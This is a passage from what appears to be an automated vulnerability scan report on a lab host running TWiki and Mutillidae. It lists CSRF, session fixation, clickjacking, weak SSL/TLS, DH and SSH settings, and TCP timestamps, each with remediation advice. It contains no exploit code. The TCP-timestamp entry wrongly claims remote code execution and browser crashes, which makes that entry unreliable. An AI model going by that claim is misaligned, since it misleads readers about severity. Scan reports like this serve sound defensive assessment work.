http://192.168.105.200/twiki/bin/edit/TWiki/sit?t=1595894814 | Target:http://192.168.105.200/twiki/bin/edit/TWiki/sit?t=1595894814 |
http://192.168.105.200/twiki/bin/edit/Main/WebHome?t=1595894618 | Target:http://192.168.105.200/twiki/bin/edit/Main/WebHome?t=1595894618 |
http://192.168.105.200/twiki/bin/edit/Main/WIKILOGOURL | Target:http://192.168.105.200/twiki/bin/edit/Main/WIKILOGOURL |
http://192.168.105.200/twiki/bin/edit/TWiki/WebTopicEditTemplateiCGgrIzcEefnNtsCWGvTdVpE | Target:http://192.168.105.200/twiki/bin/edit/TWiki/WebTopicEditTemplateiCGgrIzcEefnNtsCWGvTdVpE |
http://192.168.105.200/twiki/bin/edit/TWiki/TextFormattingRules?t=1595894746 | Target:http://192.168.105.200/twiki/bin/edit/TWiki/TextFormattingRules?t=1595894746 |
http://192.168.105.200/twiki/bin/edit/Main/WebHome | Target:http://192.168.105.200/twiki/bin/edit/Main/WebHome |
http://192.168.105.200/twiki/bin/edit/TWiki/WIKILOGOIMG?t=1595894670 | Target:http://192.168.105.200/twiki/bin/edit/TWiki/WIKILOGOIMG?t=1595894670 |
http://192.168.105.200/twiki/bin/edit/Main/WebHome?t=1595894615 | Target:http://192.168.105.200/twiki/bin/edit/Main/WebHome?t=1595894615 |
http://192.168.105.200/twiki/bin/edit/TWiki/WebTopicList?t=1595894707 | Target:http://192.168.105.200/twiki/bin/edit/TWiki/WebTopicList?t=1595894707 |
http://192.168.105.200/twiki/bin/edit/TWiki/whether?t=1595894921 | Target:http://192.168.105.200/twiki/bin/edit/TWiki/whether?t=1595894921 |
http://192.168.105.200/twiki/bin/edit/TWiki/top?t=1595894720 | Target:http://192.168.105.200/twiki/bin/edit/TWiki/top?t=1595894720 |
http://192.168.105.200/twiki/bin/edit/Main/WIKILOGOURL?t=1595894667 | Target:http://192.168.105.200/twiki/bin/edit/Main/WIKILOGOURL?t=1595894667 |
http://192.168.105.200/twiki/bin/edit/Main/WIKILOGOIMG?t=1595894615 | Target:http://192.168.105.200/twiki/bin/edit/Main/WIKILOGOIMG?t=1595894615 |
http://192.168.105.200/twiki/bin/edit/Main/WebHomesmLtmqbQKQKMtrskOTeZNsnAsnIxaanjXYFH?t=1595894665 | Target:http://192.168.105.200/twiki/bin/edit/Main/WebHomesmLtmqbQKQKMtrskOTeZNsnAsnIxaanjXYFH?t=1595894665 |
http://192.168.105.200/twiki/bin/edit/TWiki/WebRssBasepqdJdCubYLBE?t=1595894869 | Target:http://192.168.105.200/twiki/bin/edit/TWiki/WebRssBasepqdJdCubYLBE?t=1595894869 |
http://192.168.105.200/twiki/bin/edit/TWiki/WikiWikiClonesWTgdervMRixdShSobfKoAkuh | Target:http://192.168.105.200/twiki/bin/edit/TWiki/WikiWikiClonesWTgdervMRixdShSobfKoAkuh |
# | Reference |
---|---|
1 | https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF) |
1. Validate the request source by adding a one-time token.
It was possible to detect the usage of the deprecated SSLv2 and/or SSLv3 protocol on this system. An attacker might be able to use the known cryptographic flaws to eavesdrop on the connection between clients and the service to get access to sensitive data transferred within the secured connection.
CVE: [*]
CVSS Score: 4.3
Node(s) | Additional Information |
---|---|
192.168.105.200:5432 | Target: IP: 192.168.105.200 Port: 5432, It was possible to detect the usage of the deprecated SSLv2 and/or SSLv3 protocol on this system. An attacker might be able to use the known cryptographic flaws to eavesdrop on the connection between clients and the service to get access to sensitive data transferred within the secured connection. |
# | Reference |
---|---|
1 | https://www.enisa.europa.eu/activities/identity-and-trust/library/deliverables/algorithms-key-sizes-and-parameters-report |
2 | https://bettercrypto.org/ |
It is recommended to disable the deprecated SSLv2 and/or SSLv3 protocols in favor of the TLSv1+ protocols. Please see the references for more information.
This host is prone to an information disclosure vulnerability. Successful exploitation will allow man-in-the-middle attackers to gain access to the plain text data stream. Impact Level: Application
CVE: [*]
CVSS Score: 4.3
Node(s) | Additional Information |
---|---|
192.168.105.200:5432 | Target: IP: 192.168.105.200 Port: 5432, This host is prone to an information disclosure vulnerability. Successful exploitation will allow man-in-the-middle attackers to gain access to the plain text data stream. Impact Level: Application |
# | Reference |
---|---|
1 | https://www.openssl.org/~bodo/ssl-poodle.pdf |
2 | https://www.imperialviolet.org/2014/10/14/poodle.html |
3 | https://www.dfranke.us/posts/2014-10-14-how-poodle-happened.html |
4 | http://googleonlinesecurity.blogspot.in/2014/10/this-poodle-bites-exploiting-ssl-30.html |
Disable SSL v3.0
The remote service is using an SSL certificate chain that has been signed using a cryptographically weak hashing algorithm.
CVE: [*]
CVSS Score: 4.0
Node(s) | Additional Information |
---|---|
192.168.105.200:5432 | Target: IP: 192.168.105.200 Port: 5432, The remote service is using an SSL certificate chain that has been signed using a cryptographically weak hashing algorithm. |
# | Reference |
---|---|
1 | https://blog.mozilla.org/security/2014/09/23/phasing-out-certificates-with-sha-1-based-signature-algorithms/ |
The TLS service uses Diffie-Hellman groups with insufficient strength (key size < 2048). An attacker might be able to decrypt the TLS communication offline.
CVE: [*]
CVSS Score: 4.0
Node(s) | Additional Information |
---|---|
192.168.105.200:5432 | Target: IP: 192.168.105.200 Port: 5432, The TLS service uses Diffie-Hellman groups with insufficient strength (key size < 2048). An attacker might be able to decrypt the TLS communication offline. |
# | Reference |
---|---|
1 | https://weakdh.org/ |
Deploy (Ephemeral) Elliptic-Curve Diffie-Hellman (ECDHE) or use a 2048-bit or stronger Diffie-Hellman group. (see https://weakdh.org/sysadmin.html)
A session can be fixed (session fixation) by constructing malicious URLs; by luring users to log in using that session, related operations and attacks can be carried out.
CVE: [*]
CVSS Score: 4.3
Node(s) | Additional Information |
---|---|
http://192.168.105.200/mutillidae/index.php | Target: http://192.168.105.200:80/mutillidae/index.php There is a session fixation vulnerability, session: PHPSESSID |
http://192.168.105.200/mutillidae/index.php?page=password-generator.php&username=anonymous | Target: http://192.168.105.200:80/mutillidae/index.php There is a session fixation vulnerability, session: PHPSESSID |
http://192.168.105.200/mutillidae/index.php?page=home.php | Target: http://192.168.105.200:80/mutillidae/index.php There is a session fixation vulnerability, session: PHPSESSID |
http://192.168.105.200/mutillidae/?page=add-to-your-blog.php | Target: http://192.168.105.200:80/mutillidae/ There is a session fixation vulnerability, session: PHPSESSID |
http://192.168.105.200/mutillidae/index.php?page=captured-data.php | Target: http://192.168.105.200:80/mutillidae/index.php There is a session fixation vulnerability, session: PHPSESSID |
http://192.168.105.200/mutillidae/index.php?page=add-to-your-blog.php | Target: http://192.168.105.200:80/mutillidae/index.php There is a session fixation vulnerability, session: PHPSESSID |
http://192.168.105.200/mutillidae/?page=show-log.php | Target: http://192.168.105.200:80/mutillidae/ There is a session fixation vulnerability, session: PHPSESSID |
http://192.168.105.200/mutillidae/ | Target: http://192.168.105.200:80/mutillidae/ There is a session fixation vulnerability, session: PHPSESSID |
http://192.168.105.200/mutillidae/?page=text-file-viewer.php | Target: http://192.168.105.200:80/mutillidae/ There is a session fixation vulnerability, session: PHPSESSID |
http://192.168.105.200/mutillidae/index.php?do=toggle-security&page=home.php | Target: http://192.168.105.200:80/mutillidae/index.php There is a session fixation vulnerability, session: PHPSESSID |
http://192.168.105.200/mutillidae/index.php?do=toggle-security&page=password-generator.php | Target: http://192.168.105.200:80/mutillidae/index.php There is a session fixation vulnerability, session: PHPSESSID |
http://192.168.105.200/mutillidae/index.php?page=usage-instructions.php | Target: http://192.168.105.200:80/mutillidae/index.php There is a session fixation vulnerability, session: PHPSESSID |
# | Reference |
---|---|
N/A |
1. Generate SESSIONID dynamically.
Because the response header X-Frame-Options is not set in the application, it is vulnerable to clickjacking attacks. Clickjacking is a visual deception. An attacker uses a transparent and invisible iframe to cover a web page and then induces the user to operate on it. The user then clicks on the transparent iframe page without knowing it. By adjusting the location of the iframe page, users can be enticed to click on some functional buttons on the iframe page. Attackers often combine this with social engineering to complete the attack. For example, an attacker can use clickjacking through Flash to control the camera of the user's computer. With the development of touch-screen technology, clickjacking has developed further. Because mobile phone screens are limited in size, mobile browsers hide the address bar in order to save space, so visual deception on mobile phones is easier to implement.
CVE: [*]
CVSS Score: 3.1
Node(s) | Additional Information |
---|---|
http://192.168.105.200 | Target: http://192.168.105.200 No response header X-Frame-Options is set. |
# | Reference |
---|---|
N/A |
1. Disallow the nesting of iframes through JavaScript code (the frame busting method). 2. Restrict iframe loading by setting the response header X-Frame-Options. DENY: browsers refuse to load any frame pages; SAMEORIGIN: the frame page address can only be a page under the same domain name; ALLOW-FROM: you can customize the page address that is allowed to load in a frame. In addition, some browser vendors have added extensions to defend against clickjacking, such as Firefox's 'Content Security Policy' and 'No-script
The remote SSH server is configured to allow weak MD5 and/or 96-bit MAC algorithms.
CVE: [*]
CVSS Score: 2.6
Node(s) | Additional Information |
---|---|
192.168.105.200:22 | Target: IP: 192.168.105.200 Port: 22, The remote SSH server is configured to allow weak MD5 and/or 96-bit MAC algorithms. |
# | Reference |
---|---|
N/A |
Disable the weak MAC algorithms.
The remote host implements TCP timestamps and therefore allows the uptime to be computed. Successful exploitation could result in remote arbitrary code execution, spoofing attacks, sensitive information disclosure, and can crash the browser. Impact Level: System. A side effect of this feature is that the uptime of the remote host can sometimes be computed.
CVE: [*]
CVSS Score: 2.6
Node(s) | Additional Information |
---|---|
192.168.105.200 | Target: IP 192.168.105.200, The remote host implements TCP timestamps and therefore allows the uptime to be computed. Successful exploitation could result in remote arbitrary code execution, spoofing attacks, sensitive information disclosure, and can crash the browser. Impact Level: System. A side effect of this feature is that the uptime of the remote host can sometimes be computed. |
# | Reference |
---|---|
1 | http://www.ietf.org/rfc/rfc1323.txt |
To disable TCP timestamps on Linux, add the line 'net.ipv4.tcp_timestamps = 0' to /etc/sysctl.conf. Execute 'sysctl -p' to apply the settings at runtime. To disable TCP timestamps on Windows, execute 'netsh int tcp set global timestamps=disabled'. Starting with Windows Server 2008 and Vista, the timestamp cannot be completely disabled. The default behavior of the TCP/IP stack on these systems is to not use the Timestamp options when initiating TCP connections, but to use them if the TCP peer that is initiating communication includes them in its synchronize (SYN) segment. See also: http://www.microsoft.com/en-us/download/details.aspx?id=9152